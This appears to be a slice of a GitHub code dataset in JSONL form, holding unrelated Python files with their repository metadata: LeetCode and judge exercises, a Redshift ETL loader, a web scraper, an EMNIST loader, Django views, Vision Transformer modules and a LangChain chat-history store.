print(f\"{unlearning_args.output_dir}\")\n# break\n\n unlearner.save_state()\n unlearner.save_model(output_dir=unlearning_args.output_dir)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"huawei-lin/LLMsInfluenceFunc","sub_path":"unlearn.py","file_name":"unlearn.py","file_ext":"py","file_size_in_byte":5052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11156134089","text":"# '''\r\n# B 달러 빌림\r\n# R 퍼센트 이자\r\n# 매월 말 과외비 M 달러\r\n# '''\r\n#\r\n#\r\n# T = int(input())\r\n# for tc in range(T):\r\n# R, B, M = list(map(float, input().split()))\r\n#\r\n# inter = 0\r\n# cnt = 0\r\n# while True:\r\n# cnt += 1\r\n# a = (B * R / 100) + 0.00000001\r\n# inter = round(a, 2)\r\n# # print(inter)\r\n# B = B + inter - M\r\n# if B <= 0:\r\n# print(cnt)\r\n# break\r\n# if cnt > 1200:\r\n# print('impossible')\r\n# break\r\n\r\na = 2.025 + 0.000000001\r\nb = round(a, 2)\r\nprint(b)","repo_name":"HoooDev/boj","sub_path":"9333.py","file_name":"9333.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27935197390","text":"class Solution(object):\n def constructMaximumBinaryTree(self, nums):\n root = TreeNode(max(nums))\n index = 
nums.index(max(nums))\n if index > 0:\n root.left = self.constructMaximumBinaryTree(nums[:index])\n if index < len(nums)-1:\n root.right = self.constructMaximumBinaryTree(nums[index+1:])\n return root\n\n################### 递归思路 ####################\n# 方法作用极简化:判断一个结点的情况\n# 方法作用描述:参数给一个数组,取该数组的最大值作为结点,并返回该结点\n# 递归:根的左右孩子都需要剩余数组里的最大值作为结点,使用递归\nclass Solution(object):\n def constructMaximumBinaryTree(self, nums):\n root = TreeNode(max(nums))\n return root","repo_name":"linwt/nowcoder-leetcode","sub_path":"leetcode_Python/654.最大二叉树.py","file_name":"654.最大二叉树.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"zh","doc_type":"code","stars":28,"dataset":"github-code","pt":"72"} +{"seq_id":"489630416","text":"# ERRO Exception line 9\nTAMVETOR = 20;\n\nvetor = [0] * TAMVETOR;\n\nindex = 1;\n\nwhile index < TAMVETOR:\n tty = int(input());\n if tty < 10:\n vetor[ (TAMVETOR) - index] = tty;\n index+=1;\n\nfor index,item in enumerate(vetor):\n print(\"X[%d] = %s\" % ( index , item ));","repo_name":"gilberto-009199/MyPython","sub_path":"Tec.Progam.II/ACS/ACI/TrocaVetor1175.py","file_name":"TrocaVetor1175.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33927425156","text":"from grader_toolkit import Student, Assignment, Grade # noqa: F401\nimport zipfile\nimport os.path\nfrom io import StringIO\n\n\ndef gen_smartsite_upload(assignment, gtemplate, outfn):\n # type: (Assignment, str) -> None\n aname = assignment.name\n gmap = {}\n for g in assignment.grades:\n dispid = g.student.email.split('@')[0]\n gmap[dispid] = g\n idmap = {}\n gradestr = StringIO()\n gformat = \"{0},{1},{2.student.name},{2.grade}\\n\"\n for line in gtemplate:\n l = line.split(',')\n if len(l) == 5 and l[0] in gmap:\n g = gmap[l[0]]\n idmap[l[0]] = l[1]\n gradestr.write(gformat.format(dispid,\n l[1],\n g))\n else:\n gradestr.write(line)\n with zipfile.ZipFile(outfn, 'w') as outarchive:\n path = os.path.join(aname, 'grades.csv')\n outarchive.writestr(path, gradestr.getvalue())\n gradestr.close()\n for g in assignment.grades:\n dispid = g.student.email.split('@')[0]\n outid = idmap[dispid]\n stfolderfmt = \"{0}({1})\"\n if g.notes:\n path = os.path.join(aname,\n stfolderfmt.format(g.student.name, outid),\n \"comments.txt\")\n outarchive.writestr(path, g.notes)\n\n\nupload_formats = {\n 'smartsite': gen_smartsite_upload\n}\n","repo_name":"class4kayaker/grader_toolkit","sub_path":"src/grader_toolkit/interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":1452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20163182045","text":"import configparser\nimport psycopg2\nfrom sql_queries import copy_table_queries, insert_table_queries\nfrom time import time\n\n\ndef load_staging_tables(cur, conn):\n \"\"\"\n Run querys to load staging tables.\n \n Iterate over a list of staging table load queries to execute and commit to.\n \n Parameters:\n Argument1: Cursor to connect to database\n Argument2: Connection to data\n \"\"\"\n for query in copy_table_queries:\n print(\"-----------------------------------------\\n \\\n Query running:\\n {}\".format(query))\n t0 = time()\n cur.execute(query)\n conn.commit()\n loadTime = time()-t0\n print(\"\\nDone in: {0:.2f} sec\\n\".format(loadTime))\n\n\ndef insert_tables(cur, conn):\n \"\"\"\n Run querys to create tables.\n \n Iterate over a list of insert table queries to execute and commit to.\n \n 
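# English note on 654.最大二叉树.py above (its comments are Chinese): the
# recursion takes max(nums) as the root, then builds the left/right subtrees
# from the slices on either side of that maximum. TreeNode is LeetCode
# scaffolding not shown in the record; a self-contained sketch:
class TreeNode:
    def __init__(self, val=0, left=None, right=None):
        self.val, self.left, self.right = val, left, right

def construct(nums):
    if not nums:
        return None
    i = nums.index(max(nums))             # position of the maximum
    root = TreeNode(nums[i])
    root.left = construct(nums[:i])       # everything left of the max
    root.right = construct(nums[i + 1:])  # everything right of the max
    return root

root = construct([3, 2, 1, 6, 0, 5])
assert root.val == 6 and root.left.val == 3 and root.right.val == 5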
Parameters:\n Argument1: Cursor to connect to database\n Argument2: Connection to data\n \"\"\"\n for query in insert_table_queries:\n print(\"-----------------------------------------\\n \\\n Query running:\\n {}\".format(query))\n t0 = time()\n cur.execute(query)\n conn.commit()\n loadTime = time()-t0\n print(\"\\nDone in: {0:.2f} sec\\n\".format(loadTime))\n\n\ndef main():\n \"\"\"\n Main function that manages the ETL process.\n        \n        Connect to Redshift cluster database and inserts data from S3 storage.\n \"\"\"\n config = configparser.ConfigParser()\n config.read('dwh.cfg')\n\n conn = psycopg2.connect(\"host={} dbname={} user={} password={} port={}\".format(*config['CLUSTER'].values()))\n cur = conn.cursor()\n \n load_staging_tables(cur, conn)\n insert_tables(cur, conn)\n\n conn.close()\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"davidsondefaria/DataWarehouse-Udacity4","sub_path":"etl.py","file_name":"etl.py","file_ext":"py","file_size_in_byte":1851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39567671985","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jan 10 15:32:55 2019\n\n@author: natasha_yang\n\n@e-mail: ityangna0402@163.com\n\"\"\"\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom mpl_toolkits.mplot3d import Axes3D\n\nfig = plt.figure()#定义一个图像窗口\nax = Axes3D(fig)#在窗口上添加3D坐标轴\n\nx_data = np.arange(-4, 4, 0.25)\ny_data = np.arange(-4, 4, 0.25)\nx_mesh, y_mesh = np.meshgrid(x_data, y_data)\nz_mesh = np.sin(np.sqrt(x_mesh**2 + y_mesh**2))\n#rstride:row的跨度,cstride:column的跨度,rainbow填充颜色\nax.plot_surface(x_mesh, y_mesh, z_mesh, rstride=1, cstride=1, cmap=plt.get_cmap('rainbow'))\n#添加xy平面的等高线,zdir选择了x,效果将会是对于 XZ 平面的投影\nax.contourf(x_mesh, y_mesh, z_mesh, zdir='z', offset=-2, cmap=plt.get_cmap('rainbow'))\n\nplt.show()","repo_name":"yangnaGitHub/LearningProcess","sub_path":"display/matplotlib_06.py","file_name":"matplotlib_06.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34209318418","text":"#!/usr/bin/env python3\n# encoding='utf-8'\nimport requests\nfrom bs4 import BeautifulSoup\nimport re\n\n\nclass Qiushi(object):\n def __init__(self):\n self.headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X \\\n 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 \\\n Safari/537.36'}\n self.baseUrl = 'https://www.qiushibaike.com'\n self.spilUrl = 'https://www.qiushibaike.com/8hr/page/'\n self.file = open('E:/pythonWork/pythonSipder/results/qiushibaike.txt\\\n ', 'a+', encoding='utf-8')\n\n def spider(self, html):\n soup = BeautifulSoup(html, 'lxml')\n divs = soup.find_all('div', re.compile('^article'))\n for div in divs:\n if div.find_all('div', 'thumb'):\n continue\n elif div.find_all('div', 'content'):\n self.file.write(div.span.get_text())\n self.file.write('-----------------')\n\n def craw(self):\n for i in range(5):\n if i == 0:\n r = requests.get(self.baseUrl, self.headers)\n self.spider(r.text)\n else:\n r = requests.get(self.spilUrl + str(i), self.headers)\n self.spider(r.text)\n\nif __name__ == '__main__':\n obj_spider = Qiushi()\n obj_spider.craw()\n","repo_name":"yitengcheng/pythonSipder","sub_path":"get_qiushibaike.py","file_name":"get_qiushibaike.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"29091719668","text":"import tensorflow as 
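# English gloss of matplotlib_06.py above (comments are Chinese): create a
# figure window, attach 3D axes, draw sin(sqrt(x^2+y^2)) as a rainbow surface
# (rstride/cstride = row/column strides), then project filled contours onto
# the base plane. The original comment mentions zdir='x', but the call uses
# zdir='z'. Equivalent sketch, mirroring the original's Axes3D(fig) style
# (newer Matplotlib prefers fig.add_subplot(projection='3d')):
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D  # registers the 3d projection

fig = plt.figure()                        # figure window
ax = Axes3D(fig)                          # 3D axes on the window
x, y = np.meshgrid(np.arange(-4, 4, 0.25), np.arange(-4, 4, 0.25))
z = np.sin(np.sqrt(x ** 2 + y ** 2))
ax.plot_surface(x, y, z, rstride=1, cstride=1, cmap=plt.get_cmap('rainbow'))
ax.contourf(x, y, z, zdir='z', offset=-2, cmap=plt.get_cmap('rainbow'))
plt.show()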
tf\nimport numpy as np\nimport tensorflow_datasets.public_api as tfds\nfrom ..model_loader import DatasetModelLoader\n\n\nclass Emnist(DatasetModelLoader):\n\n def get_dataset(self, mislabelling_percentage=0): # https://www.tensorflow.org/datasets/catalog/emnist\n ds_train = tfds.load('emnist', split='train[:10%]')\n ds_test = tfds.load('emnist', split='test[:50%]')\n\n X_train = []\n y_train = []\n for sample in ds_train:\n X_train.append(sample['image'].numpy() / 255.0)\n y_train.append(sample['label'].numpy())\n\n X_test = []\n y_test = []\n for sample in ds_test:\n X_test.append(sample['image'].numpy() / 255.0)\n y_test.append(sample['label'].numpy())\n\n x_train = np.asarray(X_train)\n y_train = np.asarray(y_train)\n x_test = np.asarray(X_test)\n y_test = np.asarray(y_test)\n\n return x_train, y_train, x_test, y_test\n\n # Image classification task\n def get_compiled_model(self, optimizer: str, metric: str, train_data): # https://www.tensorflow.org/tutorials/quickstart/beginner\n tf_model = tf.keras.models.Sequential(\n [\n tf.keras.layers.Flatten(input_shape=(28, 28)),\n tf.keras.layers.Dense(128, activation=\"relu\"),\n tf.keras.layers.Dropout(0.2),\n tf.keras.layers.Dense(62, activation=\"softmax\"),\n ]\n )\n\n tf_model.compile(\n optimizer=optimizer, loss=\"sparse_categorical_crossentropy\", metrics=[metric]\n )\n return tf_model\n\n def get_loss_function(self):\n return \"sparse_categorical_crossentropy\"\n","repo_name":"NicholasRasi/FL-Simulator","sub_path":"fl_sim/dataset/datasets/emnist.py","file_name":"emnist.py","file_ext":"py","file_size_in_byte":1689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10405158632","text":"from datetime import timedelta\n\nfrom ..forms.exercise import *\nfrom ..models.company_assessment import *\nfrom ..forms.company import *\nfrom ..models.company import *\nfrom ..views.common import *\nimport requests\n\n\ndef company(request):\n\tif request.user.user_type.name.lower() != \"technical\":\n\t\treturn redirect(\"company_assessment_redirect\")\n\telse:\n\t\treturn render(request, 'company/company.html')\n\ndef create_dialog(request):\n\treturn render(request, 'company/dialogs/create_dialog.html')\n\ndef read(request):\n\ttry:\n\t\tdata \t\t\t\t = req_data(request,True)\n\t\tfilters \t\t\t = {}\n\t\tfilters['is_active'] = True\n\t\tfilters['company'] \t = data['company']\n\n\t\tname_search \t \t = data.pop(\"name\",\"\")\n\n\t\texclude = data.pop(\"exclude\",None)\n\t\t# has_transaction = data.get(\"transaction_type\",None)\n\t\t# if has_transaction:\n\t\t# \tfilters['transaction_type'] = has_transaction\n\n\t\tif name_search:\n\t\t\tfilters['name__icontains'] = name_search\n\n\t\tpagination = None\n\n\t\tif 'pagination' in data:\n\t\t\tpagination = data.pop(\"pagination\",None)\n\t\trecords = Company_rename.objects.filter(**filters).order_by(\"id\")\n\t\tresults = {'data':[]}\n\t\tresults['total_records'] = records.count()\n\n\t\tif pagination:\n\t\t\tresults.update(generate_pagination(pagination,records))\n\t\t\trecords = records[results['starting']:results['ending']]\n\t\tdatus = []\n\t\tfor record in records:\n\t\t\tcompany_transaction_type = []\n\t\t\trow = record.get_dict()\n\n\t\t\tif record.transaction_type:\n\t\t\t\tif not exclude:\n\t\t\t\t\tfor t_types in record.transaction_type:\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\tt_type = Exercise.objects.get(id=t_types, is_active=True, company=data['company'])\n\t\t\t\t\t\texcept 
Exercise.DoesNotExist:\n\t\t\t\t\t\t\tcontinue\n\t\t\t\t\t\ttransaction_type_dict = {\n\t\t\t\t\t\t\t\t\t\t\t\t'id'\t\t: t_type.pk,\n\t\t\t\t\t\t\t\t\t\t\t\t'name'\t\t: t_type.name,\n\t\t\t\t\t\t\t\t\t\t\t\t'is_active' : t_type.is_active,\n\t\t\t\t\t\t\t\t\t\t\t\t'code'\t\t: t_type.transaction_code,\n\t\t\t\t\t\t\t\t\t\t\t\t'set_no'\t: t_type.set_no,\n\t\t\t\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\tcompany_transaction_type.append(transaction_type_dict)\n\t\t\trow['transaction_type'] = company_transaction_type\n\t\t\tdatus.append(row)\n\t\tresults['data'] = datus\n\t\treturn success_list(results,False)\n\texcept Exception as e:\n\t\treturn HttpResponse(e, status = 400)\n\n\ndef create(request):\n\ttry: \n\t\tpostdata = req_data(request,True)\n\t\tt_term \t = \"Transaction Type\"\n\t\tc_term \t = \"Company\"\n\t\tterms \t = get_display_terms(request)\n\n\t\tif terms:\n\t\t\tif terms.transaction_types:\n\t\t\t\tt_term = terms.transaction_types\n\n\t\t\tif terms.company_rename:\n\t\t\t\tc_term = terms.company_rename\n\t\tif 'updated_transaction_types' not in postdata or not postdata['updated_transaction_types']:\n\t\t\treturn error(\"%s is required.\"%(t_term))\n\n\t\ttransaction_types = postdata.pop('updated_transaction_types',[])\n\t\t\n\t\tcompany_transaction_type = []\n\t\tfor transaction_type in transaction_types:\n\t\t\tcompany_transaction_type.append(transaction_type)\n\n\t\tpostdata['transaction_type'] = list_to_string(company_transaction_type)\n\t\thours = postdata.get(\"hours\", 0)\n\n\t\tpostdata[\"hours\"] = timedelta(hours=hours, minutes=0) \n\t\ttry:\n\t\t\tinstance = Company_rename.objects.get(id=postdata.get('id',None))\n\t\t\tcompany = Company_rename_form(postdata, instance=instance)\n\t\texcept Company_rename.DoesNotExist:\n\t\t\tif not Company_rename.objects.filter(name=postdata['name']).exists():\n\t\t\t\tcompany = Company_rename_form(postdata)\n\t\t\telse: return error(\"%s already exists.\"%(c_term))\n\n\t\tif company.is_valid():\n\t\t\tcompany.save()\n\t\t\treturn HttpResponse(\"Successfully saved.\", status = 200)\n\t\telse:\n\t\t\treturn HttpResponse(company.errors, status = 400)\n\texcept Exception as err:\n\t\treturn HttpResponse(err, status = 400)\n\n\ndef delete(request, id=None):\n\ttry:\n\t\tc_term = \"Company\"\n\t\tterms = get_display_terms(request)\n\t\tif terms:\n\t\t\tif terms.company_rename:\n\t\t\t\tc_term = terms.company_rename\n\t\thas_record = Company_assessment.objects.filter(company_rename=id,is_active=True).first()\n\t\tif has_record:\n\t\t\traise_error(\"This %s is currently in use.\"%(c_term))\n\t\ttry:\n\t\t\trecord = Company_rename.objects.get(pk = id)\n\t\t\trecord.is_active = False\n\t\t\trecord.save()\n\t\t\treturn success(\"Successfully deleted.\")\n\t\texcept Company_rename.DoesNotExist:\n\t\t\traise_error(\"Company doesn't exist.\")\n\texcept Exception as e:\n\t\treturn HttpResponse(e, status = 400)\n\n\ndef get_intelex_subjects(request):\n\ttry:\n\t\tdatus \t\t\t= req_data(request,True)\n\t\turl \t\t\t= 'http://35.185.70.123/api/read_programs/'\n\t\theaders \t\t= {'content-type': 'application/json'}\n\t\tdata \t\t\t= {'complete_detail': True}\n\t\tresult \t\t\t= requests.post(url,data=json.dumps(data),headers=headers)\n\t\tresult.encoding = 'ISO-8859-1'\n\t\trecords \t\t= result.json()\n\n\t\tfor record in records['records']:\n\t\t\thas_exists = Company_rename.objects.filter(name__iexact=record['name'],program_id=record['id'],is_active=True,company=datus['company']).first()\n\t\t\tif has_exists:\n\t\t\t\tt_type \t\t\t = 
has_exists.transaction_type\n\t\t\t\ttransaction_types = Exercise.objects.filter(program_id=record['id'], is_active=True, is_intelex=True)\n\n\t\t\t\tfor transaction_type in transaction_types:\n\t\t\t\t\tif transaction_type.pk not in t_type:\n\t\t\t\t\t\tt_type.append(transaction_type.pk)\n\n\t\t\t\tt_types \t\t\t\t\t= dict()\n\t\t\t\tt_types['program_id'] \t\t= record['id']\n\t\t\t\tt_types['is_active'] \t\t= True\n\t\t\t\tt_types['is_intelex'] \t\t= True\n\t\t\t\tt_types['company'] \t\t\t= datus['company']\n\t\t\t\tt_types['name'] \t\t\t= record['name']\n\t\t\t\tt_types['transaction_type'] = list_to_string(t_type)\n\n\t\t\t\tcompany_rename_form = Company_rename_form(t_types,instance=has_exists)\n\n\t\t\t\tif company_rename_form.is_valid():\n\t\t\t\t\tcompany_rename_form.save()\n\t\t\t\telse:\n\t\t\t\t\treturn HttpResponse(company_rename_form.errors, status = 400)\n\t\t\telse:\n\t\t\t\tprogram \t\t\t = {}\n\t\t\t\tprogram['program_id'] = record['id']\n\t\t\t\tprogram['is_active'] = True\n\t\t\t\tprogram['is_intelex'] = True\n\t\t\t\tprogram['company'] \t = datus['company']\n\t\t\t\tprogram['name'] \t = record['name']\n\n\t\t\t\ttransaction_types \t = Exercise.objects.filter(program_id=record['id'], is_active=True, is_intelex=True)\n\t\t\t\ttransaction_typesArr = []\n\t\t\t\tfor transaction_type in transaction_types:\n\t\t\t\t\ttransaction_typesArr.append(transaction_type.pk)\n\n\t\t\t\tprogram['transaction_type'] = list_to_string(transaction_typesArr)\n\n\t\t\t\tcompany_rename_form = Company_rename_form(program)\n\n\t\t\t\tif company_rename_form.is_valid():\n\t\t\t\t\tcompany_rename_form.save()\n\t\t\t\telse:\n\t\t\t\t\treturn HttpResponse(company_rename_form.errors, status = 400)\n\t\treturn HttpResponse(\"Successfully saved.\", status = 200)\n\texcept Exception as e:\n\t\treturn HttpResponse(e,status=400)\n","repo_name":"it3r4-palamine/tabulation","sub_path":"web_admin/views/company.py","file_name":"company.py","file_ext":"py","file_size_in_byte":6348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12392721529","text":"## This code is from the Transformers co-class of DLStudio:\n\n## https://engineering.purdue.edu/kak/distDLS/\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\nclass MasterEncoder(nn.Module):\n def __init__(self, max_seq_length, embedding_size, how_many_basic_encoders, num_atten_heads):\n super().__init__()\n self.max_seq_length = max_seq_length\n self.basic_encoder_arr = nn.ModuleList([BasicEncoder(\n max_seq_length, embedding_size, num_atten_heads) for _ in range(how_many_basic_encoders)]) # (A)\n\n def forward(self, sentence_tensor):\n out_tensor = sentence_tensor\n for i in range(len(self.basic_encoder_arr)): # (B)\n out_tensor = self.basic_encoder_arr[i](out_tensor)\n return out_tensor\n\n\nclass BasicEncoder(nn.Module):\n def __init__(self, max_seq_length, embedding_size, num_atten_heads):\n super().__init__()\n self.max_seq_length = max_seq_length\n self.embedding_size = embedding_size\n self.qkv_size = self.embedding_size // num_atten_heads\n self.num_atten_heads = num_atten_heads\n self.self_attention_layer = SelfAttention(\n max_seq_length, embedding_size, num_atten_heads) # (A)\n self.norm1 = nn.LayerNorm(self.embedding_size) # (C)\n self.W1 = nn.Linear(self.max_seq_length * self.embedding_size,\n self.max_seq_length * 2 * self.embedding_size)\n self.W2 = nn.Linear(self.max_seq_length * 2 * 
self.embedding_size,\n self.max_seq_length * self.embedding_size)\n self.norm2 = nn.LayerNorm(self.embedding_size) # (E)\n\n def forward(self, sentence_tensor):\n input_for_self_atten = sentence_tensor.float()\n normed_input_self_atten = self.norm1(input_for_self_atten)\n output_self_atten = self.self_attention_layer(\n normed_input_self_atten).to(device) # (F)\n input_for_FFN = output_self_atten + input_for_self_atten\n normed_input_FFN = self.norm2(input_for_FFN) # (I)\n basic_encoder_out = nn.ReLU()(\n self.W1(normed_input_FFN.view(sentence_tensor.shape[0], -1))) # (K)\n basic_encoder_out = self.W2(basic_encoder_out) # (L)\n basic_encoder_out = basic_encoder_out.view(\n sentence_tensor.shape[0], self.max_seq_length, self.embedding_size)\n basic_encoder_out = basic_encoder_out + input_for_FFN\n return basic_encoder_out\n\n#################################### Self Attention Code TransformerPreLN ###########################################\n\nclass SelfAttention(nn.Module):\n def __init__(self, max_seq_length, embedding_size, num_atten_heads):\n super().__init__()\n self.max_seq_length = max_seq_length\n self.embedding_size = embedding_size\n self.num_atten_heads = num_atten_heads\n self.qkv_size = self.embedding_size // num_atten_heads\n self.attention_heads_arr = nn.ModuleList([AttentionHead(self.max_seq_length,\n self.qkv_size) for _ in range(num_atten_heads)]) # (A)\n\n def forward(self, sentence_tensor): # (B)\n concat_out_from_atten_heads = torch.zeros(sentence_tensor.shape[0], self.max_seq_length,\n self.num_atten_heads * self.qkv_size).float()\n for i in range(self.num_atten_heads): # (C)\n sentence_tensor_portion = sentence_tensor[:,\n :, i * self.qkv_size: (i+1) * self.qkv_size]\n concat_out_from_atten_heads[:, :, i * self.qkv_size: (i+1) * self.qkv_size] = \\\n self.attention_heads_arr[i](sentence_tensor_portion) # (D)\n return concat_out_from_atten_heads\n\n\nclass AttentionHead(nn.Module):\n def __init__(self, max_seq_length, qkv_size):\n super().__init__()\n self.qkv_size = qkv_size\n self.max_seq_length = max_seq_length\n self.WQ = nn.Linear(max_seq_length * self.qkv_size,\n max_seq_length * self.qkv_size) # (B)\n self.WK = nn.Linear(max_seq_length * self.qkv_size,\n max_seq_length * self.qkv_size) # (C)\n self.WV = nn.Linear(max_seq_length * self.qkv_size,\n max_seq_length * self.qkv_size) # (D)\n self.softmax = nn.Softmax(dim=1) # (E)\n\n def forward(self, sentence_portion): # (F)\n Q = self.WQ(sentence_portion.reshape(\n sentence_portion.shape[0], -1).float()).to(device) # (G)\n K = self.WK(sentence_portion.reshape(\n sentence_portion.shape[0], -1).float()).to(device) # (H)\n V = self.WV(sentence_portion.reshape(\n sentence_portion.shape[0], -1).float()).to(device) # (I)\n Q = Q.view(sentence_portion.shape[0],\n self.max_seq_length, self.qkv_size) # (J)\n K = K.view(sentence_portion.shape[0],\n self.max_seq_length, self.qkv_size) # (K)\n V = V.view(sentence_portion.shape[0],\n self.max_seq_length, self.qkv_size) # (L)\n A = K.transpose(2, 1) # (M)\n QK_dot_prod = Q @ A # (N)\n rowwise_softmax_normalizations = self.softmax(QK_dot_prod) # (O)\n Z = rowwise_softmax_normalizations @ V\n coeff = 1.0/torch.sqrt(torch.tensor([self.qkv_size]).float()).to(device) # (S)\n Z = coeff * Z # (T)\n return Z\n","repo_name":"Russolves/Vision-Transformer","sub_path":"ViTHelper.py","file_name":"ViTHelper.py","file_ext":"py","file_size_in_byte":5531,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"29895432482","text":"import 
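# Shape sanity-check for the MasterEncoder stack in ViTHelper.py above -- a
# sketch under the stated API: embedding_size must be divisible by
# num_atten_heads, and inputs are (batch, max_seq_length, embedding_size).
# As written the module mixes .to(device) calls with CPU-allocated buffers,
# so this assumes a CPU-only run:
import torch

enc = MasterEncoder(max_seq_length=16, embedding_size=64,
                    how_many_basic_encoders=2, num_atten_heads=4)
tokens = torch.randn(8, 16, 64)           # batch of 8 dummy sequences
out = enc(tokens)
assert out.shape == (8, 16, 64)           # the encoder preserves the shape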
json\nimport logging\nfrom datetime import datetime\nfrom typing import Dict, List, Optional\nfrom uuid import UUID\n\nfrom fastapi_sqlalchemy import db\nfrom langchain.schema import (BaseChatMessageHistory, BaseMessage,\n _message_to_dict)\nfrom langchain.schema.messages import AIMessage, HumanMessage\n\nfrom models.chat_message import ChatMessage\n\nlogger = logging.getLogger(__name__)\n\n\nclass ChatMessageJSONEncoder(json.JSONEncoder):\n def default(self, obj: object):\n if isinstance(obj, UUID):\n # if the obj is uuid, we simply return the value of uuid\n return str(obj)\n if isinstance(obj, datetime):\n # for datetime objects, convert to string in your preferred format\n return obj.isoformat()\n return super().default(obj)\n\n\nclass PostgresChatMessageHistory(BaseChatMessageHistory):\n def __init__(\n self,\n sender_account_id: Optional[str],\n sender_user_id: Optional[str],\n # user: Optional[UserOutput],\n session_id: Optional[str],\n parent_id: Optional[str] = None,\n agent_id: Optional[str] = None,\n team_id: Optional[str] = None,\n sender_name: Optional[str] = None,\n chat_id: Optional[str] = None,\n run_id: Optional[UUID] = None,\n ):\n self.sender_account_id = sender_account_id\n self.sender_user_id = sender_user_id\n # self.user = user\n self.session_id = session_id\n self.parent_id = parent_id\n self.agent_id = agent_id\n self.team_id = team_id\n self.sender_name = sender_name\n self.chat_id = chat_id\n self.run_id = run_id\n\n @property\n def messages(self) -> List[BaseMessage]: # type: ignore\n \"\"\"Retrieve the messages from PostgreSQL\"\"\"\n return []\n\n def create_message(\n self,\n message,\n parent_id: Optional[str] = None,\n agent_id: Optional[UUID] = None,\n voice_url: Optional[str] = None,\n ):\n # Append the message to the record in PostgreSQL\n chat_message = ChatMessage(\n sender_user_id=self.sender_user_id,\n sender_account_id=self.sender_account_id,\n message=_message_to_dict(message),\n session_id=self.session_id,\n agent_id=self.agent_id or agent_id,\n team_id=self.team_id,\n parent_id=parent_id,\n sender_name=self.sender_name,\n chat_id=self.chat_id,\n run_id=self.run_id,\n voice_url=voice_url,\n )\n\n db.session.add(chat_message)\n db.session.commit()\n db.session.refresh(chat_message)\n\n # Serialize the model instance's data dictionary\n data_dict = chat_message.to_dict()\n if chat_message.parent:\n parent_dict = chat_message.parent.to_dict()\n data_dict[\"parent\"] = parent_dict\n\n data_json = json.dumps(\n data_dict, cls=ChatMessageJSONEncoder\n ) # Use default=str to handle UUID and datetime\n # print(\"the result\", json.loads(data_json))\n return json.loads(data_json)\n\n def create_ai_message(\n self,\n message: str,\n parent_id: Optional[str] = None,\n agent_id: Optional[str] = None,\n voice_url: Optional[str] = None,\n ):\n return self.create_message(\n AIMessage(content=message), parent_id, agent_id, voice_url\n )\n\n def create_human_message(self, message: str, voice_url: Optional[str] = None):\n return self.create_message(\n HumanMessage(\n content=message,\n additional_kwargs={\n \"name\": self.sender_name,\n },\n ),\n parent_id=self.parent_id,\n voice_url=voice_url,\n )\n\n def add_message(self, message: BaseMessage) -> str:\n \"\"\"Append the message to the record in PostgreSQL\"\"\"\n return \"\"\n\n def update_thoughts(self, message_id: str, thoughts: List[Dict]):\n chat_message: ChatMessage = db.session.query(ChatMessage).get(message_id)\n chat_message.thoughts = thoughts\n db.session.commit()\n\n updated_message_json = 
json.dumps(\n chat_message.to_dict(), cls=ChatMessageJSONEncoder\n )\n return json.loads(updated_message_json)\n\n def delete_message(self, message_id: str):\n chat_message: ChatMessage = db.session.query(ChatMessage).get(message_id)\n db.session.delete(chat_message)\n db.session.commit()\n\n def clear(self) -> None:\n \"\"\"Clear session memory from PostgreSQL\"\"\"\n return None\n\n def __del__(self) -> None:\n return None\n","repo_name":"l3vels/L3AGI","sub_path":"apps/server/postgres.py","file_name":"postgres.py","file_ext":"py","file_size_in_byte":4683,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"72"} +{"seq_id":"2868079821","text":"'''\r\nCreated on Oct 1, 2017\r\n\r\n@author: sista\r\n'''\r\n\r\n\r\nclass Solution(object):\r\n def findPairs(self, nums, k):\r\n \"\"\"\r\n :type nums: List[int]\r\n :type k: int\r\n :rtype: int\r\n \"\"\"\r\n #nums=[3,1,4,1,5]\r\n #k=2\r\n output=[]\r\n output1=[]\r\n output2=[]\r\n var=[]\r\n for i in range(len(nums)):\r\n for j in range(i):\r\n if(abs(nums[i]-nums[j]) == k):\r\n var.append(nums[i])\r\n var.append(nums[j])\r\n output.append(var)\r\n var=[]\r\n\r\n for i in output:\r\n if i not in output1:\r\n output1.append(i)\r\n \r\n for j in output1:\r\n if (j not in output2) and (j[::-1] not in output2):\r\n output2.append(j)\r\n \r\n return (len(output2))\r\n \r\n \r\nsol=Solution();\r\nnums=[3,1,4,1,5];\r\nk=2;\r\nprint(sol.findPairs(nums, k))\r\n\r\n","repo_name":"Hasanth-Sista/leetCode","sub_path":"532Python.py","file_name":"532Python.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} 